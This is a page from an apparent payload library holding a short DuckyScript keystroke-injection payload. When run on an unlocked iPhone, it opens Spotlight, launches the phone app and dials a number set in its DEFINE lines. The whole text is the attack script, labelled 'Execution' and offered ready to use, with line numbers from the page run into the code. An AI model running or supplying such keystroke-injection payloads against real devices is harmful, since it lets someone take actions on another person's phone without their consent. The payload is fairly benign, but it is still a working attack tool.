Path: blob/master/payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
3018 views
REM ##############################################1REM # |2REM # Title : Call Someone On An iPhone |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Execution |6REM # Target : iPhone |7REM # |8REM ##############################################91011REM Requirements:12REM - The phone must be unlocked1314REM Tested on:15REM - iPhone 1416REM - iOS 16.4.11718REM You need to change the name of the application according to the language you have on your phone.19DEFINE #PHONE-APP-NAME example20REM You must set the phone number to be called21DEFINE #NUMBER example2223GUI SPACE24DELAY 30025STRING #PHONE-APP-NAME26ENTER27DELAY 100028BACKSPACE29STRING #NUMBER30DELAY 50031ENTER323334